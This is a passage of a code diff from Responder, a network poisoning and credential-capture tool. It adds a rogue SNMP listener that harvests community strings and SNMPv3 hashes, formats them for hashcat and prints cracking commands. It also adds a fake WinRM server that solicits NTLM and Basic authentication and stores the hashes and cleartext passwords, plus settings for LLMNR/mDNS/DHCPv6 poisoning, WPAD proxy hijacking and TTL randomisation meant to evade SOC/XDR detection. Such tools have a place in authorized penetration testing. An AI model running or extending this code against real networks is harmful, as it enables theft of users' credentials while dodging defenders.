+            if not auth_params or auth_params == '00' * 12:
+                # Still save the username with noAuth indicator
+                SaveToDb({
+                    "module": "SNMP",
+                    "type": "SNMPv3-noAuth",
+                    "client": self.client_address[0],
+                    "user": snmp_user,
+                    "cleartext": "(noAuth)",
+                    "fullhash": snmp_user + ":(noAuth)"
+                })
+                return
+            
+            # Build hashcat-compatible hash
+            if hashcat_mode:
+                # Format for mode 25000: $SNMPv3$<type>$<boots>$<packet>$<engine_id>$<auth_params>
+                # type: 0=MD5/SHA1, 1=SHA1, 2=SHA224, etc.
+                # boots: engine boots in decimal
+                # packet: full SNMP packet in hex
+                # engine_id: engine ID in hex
+                # auth_params: authentication parameters in hex
+                
+                auth_type_map = {
+                    25000: 0,  # MD5/SHA1 combined
+                    25100: 0,  # MD5
+                    25200: 1,  # SHA1
+                    25300: 2,  # SHA224
+                    25400: 3,  # SHA256
+                    25500: 4,  # SHA384
+                    25600: 5,  # SHA512
+                }
+                auth_type = auth_type_map.get(hashcat_mode, 0)
+                
+                # Build the hash in correct format
+                hashcat_hash = "$SNMPv3$%d$%d$%s$%s$%s" % (
+                    auth_type,
+                    engine_boots,
+                    full_snmp_msg,
+                    engine_id,
+                    auth_params
+                )
+                
+                if settings.Config.Verbose:
+                    print(text('[SNMP] SNMPv3 hash captured!'))
+                    print(text('[SNMP] Crack with: hashcat -m %d hash.txt wordlist.txt' % hashcat_mode))
+                    if hashcat_mode == 25000:
+                        print(text('[SNMP] Note: Mode 25000 tries both MD5 and SHA1'))
+                        print(text('[SNMP] Or use -m 25100 (MD5 only) or -m 25200 (SHA1 only)'))
+                
+                # Sanitize type name for filesystem (remove slashes)
+                safe_type = auth_algo_name.replace('/', '-')
+                
+                SaveToDb({
+                    "module": "SNMP",
+                    "type": "SNMPv3-%s" % safe_type,
+                    "client": self.client_address[0],
+                    "user": snmp_user,
+                    "hash": hashcat_hash,
+                    "fullhash": hashcat_hash
+                })
+            else:
+                # Unknown algorithm or no auth - save basic info
+                SaveToDb({
+                    "module": "SNMP",
+                    "type": "SNMPv3",
+                    "client": self.client_address[0],
+                    "user": snmp_user,
+                    "hash": auth_params,
+                    "fullhash": "{}:{}:{}:{}".format(snmp_user, full_snmp_msg, engine_id, auth_params)
+                })
+            
+            # Send a response (Report PDU indicating authentication failure)
+            # This keeps the conversation going
+            self.send_snmpv3_report(socket)
+            
+        except Exception as e:
+            if settings.Config.Verbose:
+                print(text('[SNMP] SNMPv3 parsing error: %s' % str(e)))
+            pass
+    
+    def handle_snmpv1v2c(self, data, received_record, snmp_version, socket):
+        """Handle SNMPv1/v2c messages and extract community strings"""
+        try:
+            community_string = str(received_record['field-1'])
+            version_str = 'v1' if snmp_version == 0 else 'v2c'
+            
+            if settings.Config.Verbose:
+                print(text('[SNMP] %s Community String: %s' % (version_str, community_string)))
+            
+            # Validate community string (should be printable)
+            if not community_string or not self.is_printable(community_string):
+                return
+            
+            SaveToDb({
+                "module": "SNMP",
+                "type": "Cleartext SNMP%s" % version_str,
+                "client": self.client_address[0],
+                "user": community_string,
+                "cleartext": community_string,
+                "fullhash": community_string,
+            })
+            
+            # Send a response (could be a proper SNMP response or error)
+            # For now, we just close the connection
+            
+        except Exception as e:
+            if settings.Config.Verbose:
+                print(text('[SNMP] SNMPv1/v2c parsing error: %s' % str(e)))
+            pass
+    
+    def identify_auth_algorithm(self, data):
+        """
+        Identify the authentication algorithm used in SNMPv3
+        Returns (algorithm_name, hashcat_mode)
+        """
+        try:
+            # Look for OID patterns in the raw data
+            for oid_bytes, (algo_name, hashcat_mode) in SNMPV3_AUTH_ALGORITHMS.items():
+                if oid_bytes in data:
+                    return (algo_name, hashcat_mode)
+            
+            # If not found by OID, try to infer from auth params length
+            # MD5: 12 bytes, SHA1: 12 bytes, SHA224: 16 bytes, SHA256: 24 bytes, SHA384: 32 bytes, SHA512: 48 bytes
+            # Note: This is less reliable
+            
+            return (None, None)
+        except:
+            return (None, None)
+    
+    def is_printable(self, s):
+        """Check if string contains only printable characters"""
+        try:
+            return all(32 <= ord(c) <= 126 for c in s)
+        except:
+            return False
+    
+    def send_snmpv3_report(self, socket):
+        """
+        Send a minimal SNMPv3 Report PDU
+        This indicates authentication failure but keeps the conversation alive
+        """
+        try:
+            # Minimal Report PDU - just close for now
+            # A proper implementation would build a valid SNMP Report PDU
+            pass
+        except:
+            pass
+    
+    def send_discovery_response(self, socket, received_record):
+        """
+        Send SNMPv3 discovery response with engine ID
+        This allows the client to send authenticated request
+        """
+        try:
+            from pyasn1.type import univ
+            from pyasn1.codec.ber.encoder import encode
+            import os
+            import time
+            
+            # Generate a random engine ID (or use a fixed one)
+            # Format: 0x80 + enterprise ID (4 bytes) + format + data
+            # Enterprise ID: 0x00000000 (reserved)
+            # Format: 0x05 (octets - allows arbitrary data)
+            # Data: 12 random bytes (17 bytes total to match hashcat requirements)
+            engine_id = b'\x80\x00\x00\x00\x05' + os.urandom(12)
+            
+            # Engine boots and time
+            engine_boots = 1
+            engine_time = int(time.time()) % 2147483647
+            
+            # Build the SNMPv3 message with Report-PDU
+            # Structure: SEQUENCE { version, globalData, securityParameters, scopedPDU }
+            
+            # Global data
+            msg_id = int(received_record['field-1']['field-0'])
+            global_data = univ.Sequence()
+            global_data.setComponentByPosition(0, univ.Integer(msg_id))
+            global_data.setComponentByPosition(1, univ.Integer(65507))  # max size
+            global_data.setComponentByPosition(2, univ.OctetString(hexValue='04'))  # flags: reportable
+            global_data.setComponentByPosition(3, univ.Integer(3))  # USM
+            
+            # Security parameters (USM)
+            usm_params = univ.Sequence()
+            usm_params.setComponentByPosition(0, univ.OctetString(hexValue=engine_id.hex()))  # engine ID
+            usm_params.setComponentByPosition(1, univ.Integer(engine_boots))
+            usm_params.setComponentByPosition(2, univ.Integer(engine_time))
+            usm_params.setComponentByPosition(3, univ.OctetString(''))  # username
+            usm_params.setComponentByPosition(4, univ.OctetString(hexValue='00' * 12))  # auth params
+            usm_params.setComponentByPosition(5, univ.OctetString(''))  # priv params
+            
+            # Encode USM params
+            usm_encoded = encode(usm_params)
+            
+            from pyasn1.type import tag
+            
+            # Build Report-PDU with IMPLICIT tagging [8]
+            # The [8] tag REPLACES the SEQUENCE tag, not wraps it
+            
+            # VarBind: OID + value
+            varbind_inner = univ.Sequence()
+            varbind_inner.setComponentByPosition(0, univ.ObjectIdentifier('1.3.6.1.6.3.15.1.1.4.0'))
+            varbind_inner.setComponentByPosition(1, univ.Integer(1))
+            varbind_encoded = encode(varbind_inner)
+            
+            # VarBindList (SEQUENCE OF)
+            varbind_list_content = varbind_encoded
+            varbind_list_bytes = bytes([0x30, len(varbind_list_content)]) + varbind_list_content
+            
+            # Report-PDU content (without SEQUENCE tag, will use [8] instead)
+            report_content = b''
+            # request-id
+            report_content += encode(univ.Integer(msg_id))
+            # error-status
+            report_content += encode(univ.Integer(0))
+            # error-index  
+            report_content += encode(univ.Integer(0))
+            # variable-bindings
+            report_content += varbind_list_bytes
+            
+            # Tag as [8] IMPLICIT (replaces SEQUENCE tag)
+            report_pdu_bytes = bytes([0xa8, len(report_content)]) + report_content
+            
+            # Build scopedPDU as plain SEQUENCE (no [0] tag for plaintext)
+            # RFC 3412: plaintext msgData is just the ScopedPDU SEQUENCE
+            scoped_content = b''
+            # contextEngineID (OCTET STRING)
+            engine_bytes = bytes.fromhex(engine_id.hex())
+            scoped_content += bytes([0x04, len(engine_bytes)]) + engine_bytes
+            # contextName (OCTET STRING, empty)
+            scoped_content += bytes([0x04, 0x00])
+            # data (Report-PDU with implicit tag [8])
+            scoped_content += report_pdu_bytes
+            
+            # msgData is just a SEQUENCE containing scopedPDU (no [0] tag)
+            msg_data_bytes = bytes([0x30, len(scoped_content)]) + scoped_content
+            
+            # Use Any to include raw bytes
+            msg_data = univ.Any(hexValue=msg_data_bytes.hex())
+            
+            # Full SNMPv3 message
+            snmp_msg = univ.Sequence()
+            snmp_msg.setComponentByPosition(0, univ.Integer(3))  # version snmpv3
+            snmp_msg.setComponentByPosition(1, global_data)
+            snmp_msg.setComponentByPosition(2, univ.OctetString(usm_encoded))
+            snmp_msg.setComponentByPosition(3, msg_data)  # msgData with plaintext tag
+            
+            # Encode and send
+            response = encode(snmp_msg)
+            socket.sendto(response, self.client_address)
+            
+            if settings.Config.Verbose:
+                print(text('[SNMP] Sent discovery response with engine ID: %s' % engine_id.hex()))
+        
+        except Exception as e:
+            if settings.Config.Verbose:
+                print(text('[SNMP] Error sending discovery response: %s' % str(e)))

servers/WinRM.py

@@ -0,0 +1,184 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode, b64encode
+from packets import NTLM_Challenge
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans
+from packets import WPADScript, ServeExeFile, ServeHtmlFile
+
+
+# Parse NTLMv1/v2 hash.
+def ParseHTTPHash(data, Challenge, client, module):
+	LMhashLen    = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHashFinal  = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	
+	NthashLen    = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen]
+	NTHashFinal  = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
+	UserLen      = struct.unpack('<H',data[36:38])[0]
+	UserOffset   = struct.unpack('<H',data[40:42])[0]
+	User         = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
+	Challenge1    = codecs.encode(Challenge,'hex').decode('latin-1')
+	if NthashLen == 24:
+		HostNameLen     = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
+		SaveToDb({
+			'module': module, 
+			'type': 'NTLMv1', 
+			'client': client, 
+			'host': HostName, 
+			'user': User, 
+			'hash': LMHashFinal+':'+NTHashFinal, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 24:
+		NthashLen      = 64
+		DomainLen      = struct.unpack('<H',data[28:30])[0]
+		DomainOffset   = struct.unpack('<H',data[32:34])[0]
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
+		HostNameLen    = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
+		SaveToDb({
+			'module': module, 
+			'type': 'NTLMv2', 
+			'client': client, 
+			'host': HostName, 
+			'user': Domain + '\\' + User,
+			'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
+			'fullhash': WriteHash,
+		})
+
+# Handle HTTP packet sequence.
+def PacketSequence(data, client, Challenge):
+	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
+	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
+
+	if NTLM_Auth or NTLM_Auth2:
+		if NTLM_Auth2:
+			Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
+		if NTLM_Auth:
+			Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+		if Packet_NTLM == b'\x01':
+			Buffer = NTLM_Challenge(NegoFlags="\x35\x82\x89\xe2", ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			if NTLM_Auth2:
+				Buffer_Ans = WinRM_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+				return Buffer_Ans
+			else:
+				Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+				return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			if NTLM_Auth2:
+				NTLM_Auth = b64decode(''.join(NTLM_Auth2))
+			else:
+				NTLM_Auth = b64decode(''.join(NTLM_Auth))
+
+			ParseHTTPHash(NTLM_Auth, Challenge, client, "WinRM")
+			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+			Buffer.calculate()
+			return Buffer
+
+	elif Basic_Auth:
+		ClearText_Auth = b64decode(''.join(Basic_Auth))
+
+		SaveToDb({
+			'module': 'WinRM', 
+			'type': 'Basic', 
+			'client': client, 
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
+			})
+
+		Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+		Buffer.calculate()
+		return Buffer
+	else:
+		if settings.Config.Basic:
+			r = IIS_Basic_401_Ans()
+			r.calculate()
+			Response = r
+			if settings.Config.Verbose:
+				print(text("[WinRM] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
+
+		else:
+			r = IIS_Auth_401_Ans()
+			r.calculate()
+			Response = r
+			if settings.Config.Verbose:
+				print(text("[WinRM] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
+
+		return Response
+
+# HTTP Server class
+class WinRM(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+		
+		except:
+			self.request.close()
+			pass
+			

settings.py

@@ -14,13 +14,16 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import utils
-import ConfigParser
+import utils, sys, random
+if (sys.version_info > (3, 0)):
+	import configparser as ConfigParser
+else:
+	import ConfigParser
 import subprocess
 
 from utils import *
 
-__version__ = 'Responder 2.3.3.6'
+__version__ = 'Responder 3.2.2.0'
 
 class Settings:
 	
@@ -39,25 +42,56 @@ class Settings:
 		return str.upper() == 'ON'
 
 	def ExpandIPRanges(self):
-		def expand_ranges(lst):
+		def expand_ranges(lst):	
 			ret = []
 			for l in lst:
-				tab = l.split('.')
-				x = {}
-				i = 0
-				for byte in tab:
-					if '-' not in byte:
-						x[i] = x[i+1] = int(byte)
-					else:
-						b = byte.split('-')
-						x[i] = int(b[0])
-						x[i+1] = int(b[1])
-					i += 2
-				for a in range(x[0], x[1]+1):
-					for b in range(x[2], x[3]+1):
-						for c in range(x[4], x[5]+1):
-							for d in range(x[6], x[7]+1):
-								ret.append('%d.%d.%d.%d' % (a, b, c, d))
+				if ':' in l: #For IPv6 addresses, similar to the IPv4 version below but hex and pads :'s to expand shortend addresses 
+					while l.count(':') < 7: 
+						pos = l.find('::')
+						l = l[:pos] + ':' + l[pos:]
+					tab = l.split(':')
+					x = {}
+					i = 0
+					xaddr = ''
+					for byte in tab:
+						if byte == '':
+							byte = '0'
+						if '-' not in byte:
+							x[i] = x[i+1] = int(byte, base=16)
+						else:
+							b = byte.split('-')
+							x[i] = int(b[0], base=16)
+							x[i+1] = int(b[1], base=16)
+						i += 2
+					for a in range(x[0], x[1]+1):
+						for b in range(x[2], x[3]+1):
+							for c in range(x[4], x[5]+1):
+								for d in range(x[6], x[7]+1):
+									for e in range(x[8], x[9]+1):
+										for f in range(x[10], x[11]+1):
+											for g in range(x[12], x[13]+1):
+												for h in range(x[14], x[15]+1):
+													xaddr = ('%x:%x:%x:%x:%x:%x:%x:%x' % (a, b, c, d, e, f, g, h))
+													xaddr = re.sub('(^|:)0{1,4}', ':', xaddr, count = 7)#Compresses expanded IPv6 address
+													xaddr = re.sub(':{3,7}', '::', xaddr, count = 7)
+													ret.append(xaddr)
+				else:				
+					tab = l.split('.')
+					x = {}
+					i = 0
+					for byte in tab:
+						if '-' not in byte:
+							x[i] = x[i+1] = int(byte)
+						else:
+							b = byte.split('-')
+							x[i] = int(b[0])
+							x[i+1] = int(b[1])
+						i += 2
+					for a in range(x[0], x[1]+1):
+						for b in range(x[2], x[3]+1):
+							for c in range(x[4], x[5]+1):
+								for d in range(x[6], x[7]+1):
+									ret.append('%d.%d.%d.%d' % (a, b, c, d))
 			return ret
 
 		self.RespondTo = expand_ranges(self.RespondTo)
@@ -65,30 +99,47 @@ class Settings:
 
 	def populate(self, options):
 
-		if options.Interface is None and utils.IsOsX() is False:
-			print utils.color("Error: -I <if> mandatory option is missing", 1)
+		if options.Interface == None and utils.IsOsX() == False:
+			print(utils.color("Error: -I <if> mandatory option is missing", 1))
 			sys.exit(-1)
 
 		if options.Interface == "ALL" and options.OURIP == None:
-			print utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1)
+			print(utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1))
 			sys.exit(-1)
-
+		#Python version
+		if (sys.version_info > (3, 0)):
+			self.PY2OR3     = "PY3"
+		else:
+			self.PY2OR3	= "PY2"
 		# Config parsing
 		config = ConfigParser.ConfigParser()
 		config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
 
-		# Servers
+        # Poisoners
+		self.LLMNR_On_Off    = self.toBool(config.get('Responder Core', 'LLMNR'))
+		self.NBTNS_On_Off    = self.toBool(config.get('Responder Core', 'NBTNS'))
+		self.MDNS_On_Off     = self.toBool(config.get('Responder Core', 'MDNS'))
+		self.DHCPv6_On_Off   = self.toBool(config.get('Responder Core', 'DHCPv6'))
+
+        # Servers
 		self.HTTP_On_Off     = self.toBool(config.get('Responder Core', 'HTTP'))
 		self.SSL_On_Off      = self.toBool(config.get('Responder Core', 'HTTPS'))
 		self.SMB_On_Off      = self.toBool(config.get('Responder Core', 'SMB'))
+		self.QUIC_On_Off     = self.toBool(config.get('Responder Core', 'QUIC'))
 		self.SQL_On_Off      = self.toBool(config.get('Responder Core', 'SQL'))
+		self.MYSQL_On_Off    = self.toBool(config.get('Responder Core', 'MYSQL'))
 		self.FTP_On_Off      = self.toBool(config.get('Responder Core', 'FTP'))
 		self.POP_On_Off      = self.toBool(config.get('Responder Core', 'POP'))
 		self.IMAP_On_Off     = self.toBool(config.get('Responder Core', 'IMAP'))
 		self.SMTP_On_Off     = self.toBool(config.get('Responder Core', 'SMTP'))
 		self.LDAP_On_Off     = self.toBool(config.get('Responder Core', 'LDAP'))
+		self.MQTT_On_Off     = self.toBool(config.get('Responder Core', 'MQTT'))
 		self.DNS_On_Off      = self.toBool(config.get('Responder Core', 'DNS'))
+		self.RDP_On_Off      = self.toBool(config.get('Responder Core', 'RDP'))
+		self.DCERPC_On_Off   = self.toBool(config.get('Responder Core', 'DCERPC'))
+		self.WinRM_On_Off    = self.toBool(config.get('Responder Core', 'WINRM'))
 		self.Krb_On_Off      = self.toBool(config.get('Responder Core', 'Kerberos'))
+		self.SNMP_On_Off     = self.toBool(config.get('Responder Core', 'SNMP'))
 
 		# Db File
 		self.DatabaseFile    = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database'))
@@ -104,14 +155,106 @@ class Settings:
 		self.AnalyzeLogFile      = os.path.join(self.LogDir, config.get('Responder Core', 'AnalyzeLog'))
 		self.ResponderConfigDump = os.path.join(self.LogDir, config.get('Responder Core', 'ResponderConfigDump'))
 
+		# CLI options
+		self.ExternalIP         = options.ExternalIP
+		self.LM_On_Off          = options.LM_On_Off
+		self.NOESS_On_Off       = options.NOESS_On_Off
+		self.WPAD_On_Off        = options.WPAD_On_Off
+		self.DHCP_On_Off        = options.DHCP_On_Off
+		self.DHCPv6_On_Off      = options.DHCPv6_On_Off
+		self.Basic              = options.Basic
+		self.Interface          = options.Interface
+		self.OURIP              = options.OURIP
+		self.Force_WPAD_Auth    = options.Force_WPAD_Auth
+		self.Upstream_Proxy     = options.Upstream_Proxy
+		self.AnalyzeMode        = options.Analyze
+		self.Verbose            = options.Verbose
+		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
+		self.CommandLine        = str(sys.argv)
+		self.Bind_To            = utils.FindLocalIP(self.Interface, self.OURIP)
+		self.Bind_To6           = utils.FindLocalIP6(self.Interface, self.OURIP)
+		self.DHCP_DNS           = options.DHCP_DNS
+		self.ExternalIP6        = options.ExternalIP6
+		self.Quiet_Mode			= options.Quiet
+		self.AnswerName			= options.AnswerName
+		self.ErrorCode          = options.ErrorCode
+		self.RDNSS_On_Off = options.RDNSS_On_Off
+		self.DNSSL_Domain = options.DNSSL_Domain
+
+		# TTL blacklist. Known to be detected by SOC / XDR
+		TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]
+		# Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py)
+		if options.TTL is None:
+			self.TTL = None
+			
+		# Random TTL
+		elif options.TTL.upper() == "RANDOM":
+			TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x'))
+			if TTL in TTL_blacklist:
+				TTL = int.from_bytes(TTL, "big")+1
+				TTL = int.to_bytes(TTL, 4)
+			self.TTL = TTL.decode('utf-8')
+		else:
+			self.TTL = bytes.fromhex("000000"+options.TTL).decode('utf-8')
+
+		#Do we have IPv6 for real?
+		self.IPv6 = utils.Probe_IPv6_socket()
+			
+		if self.Interface == "ALL":
+			self.Bind_To_ALL  = True
+		else:
+			self.Bind_To_ALL  = False
+		#IPV4
+		if self.Interface == "ALL":
+			self.IP_aton   = socket.inet_aton(self.OURIP)
+		else:
+			self.IP_aton   = socket.inet_aton(self.Bind_To)
+		#IPV6
+		if self.Interface == "ALL":
+			if self.OURIP != None and utils.IsIPv6IP(self.OURIP):
+				self.IP_Pton6   = socket.inet_pton(socket.AF_INET6, self.OURIP)
+		else:
+			self.IP_Pton6   = socket.inet_pton(socket.AF_INET6, self.Bind_To6)
+		
+		#External IP
+		if self.ExternalIP:
+			if utils.IsIPv6IP(self.ExternalIP):
+				sys.exit(utils.color('[!] IPv6 address provided with -e parameter. Use -6 IPv6_address instead.', 1))
+
+			self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
+			self.ExternalResponderIP = utils.RespondWithIP()
+		else:
+			self.ExternalResponderIP = self.Bind_To
+			
+		#External IPv6
+		if self.ExternalIP6:
+			self.ExternalIP6Pton = socket.inet_pton(socket.AF_INET6, self.ExternalIP6)
+			self.ExternalResponderIP6 = utils.RespondWithIP6()
+		else:
+			self.ExternalResponderIP6 = self.Bind_To6
+
+		# Kerberos operation mode: CAPTURE (AS-REP hashes) or FORCE_NTLM (force fallback)
+		try:
+			self.KerberosMode = config.get('Kerberos', 'KerberosMode').strip()
+			if self.KerberosMode not in ['CAPTURE', 'FORCE_NTLM']:
+				print('[Config] Invalid KerberosMode: %s, defaulting to CAPTURE' % self.KerberosMode)
+				self.KerberosMode = 'CAPTURE'
+		except:
+			# Default to CAPTURE mode if not specified (backward compatible)
+			self.KerberosMode = 'CAPTURE'
+        
+		self.Os_version      = sys.platform
+
 		self.FTPLog          = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
 		self.IMAPLog         = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
 		self.POP3Log         = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
 		self.HTTPBasicLog    = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
 		self.LDAPClearLog    = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
+		self.MQTTLog	     = os.path.join(self.LogDir, 'MQTT-Clear-Text-Password-%s.txt')
 		self.SMBClearLog     = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
 		self.SMTPClearLog    = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
 		self.MSSQLClearLog   = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
+		self.SNMPLog         = os.path.join(self.LogDir, 'SNMP-Clear-Text-Password-%s.txt')
 
 		self.LDAPNTLMv1Log   = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
 		self.HTTPNTLMv1Log   = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
@@ -134,80 +277,80 @@ class Settings:
 		self.WPAD_Script      = config.get('HTTP Server', 'WPADScript')
 		self.HtmlToInject     = config.get('HTTP Server', 'HtmlToInject')
 
-		if not os.path.exists(self.Html_Filename):
-			print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1)
+		if len(self.HtmlToInject) == 0:
+			self.HtmlToInject = ""# Let users set it up themself in Responder.conf. "<img src='file://///"+self.Bind_To+"/pictures/logo.jpg' alt='Loading' height='1' width='1'>"
 
-		if not os.path.exists(self.Exe_Filename):
-			print utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)
+		if len(self.WPAD_Script) == 0:
+			if self.WPAD_On_Off:
+				self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}'
+				
+			if self.ProxyAuth_On_Off:
+				self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}'
+
+		if self.Serve_Exe == True:	
+			if not os.path.exists(self.Html_Filename):
+				print(utils.color("/!\\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
+
+			if not os.path.exists(self.Exe_Filename):
+				print(utils.color("/!\\ Warning: %s: file not found" % self.Exe_Filename, 3, 1))
+
+		# DHCPv6 Server Options
+		try:
+			self.DHCPv6_Domain = config.get('DHCPv6 Server', 'DHCPv6_Domain')
+			self.DHCPv6_SendRA = self.toBool(config.get('DHCPv6 Server', 'SendRA'))
+			self.Bind_To_IPv6 = config.get('DHCPv6 Server', 'BindToIPv6')
+		except:
+		# Defaults if section doesn't exist
+			self.DHCPv6_Domain = ''
+			self.DHCPv6_SendRA = False
+			self.Bind_To_IPv6 = ''
 
 		# SSL Options
 		self.SSLKey  = config.get('HTTPS Server', 'SSLKey')
 		self.SSLCert = config.get('HTTPS Server', 'SSLCert')
 
 		# Respond to hosts
-		self.RespondTo         = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
-		self.RespondToName     = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])
-		self.DontRespondTo     = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
-		self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
-
+		self.RespondTo         = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]))
+		self.RespondToName     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]))
+		self.DontRespondTo     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]))
+		self.DontRespondToTLD  = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToTLD').strip().split(',')]))
+		self.DontRespondToName_= list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))
+		#add a .local to all provided DontRespondToName
+		self.MDNSTLD           = ['.LOCAL']
+		self.DontRespondToName = [x+y for x in self.DontRespondToName_ for y in ['']+self.MDNSTLD]
+		#Generate Random stuff for one Responder session
+		self.MachineName       = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
+		self.Username            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])
+		self.Domain            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)])
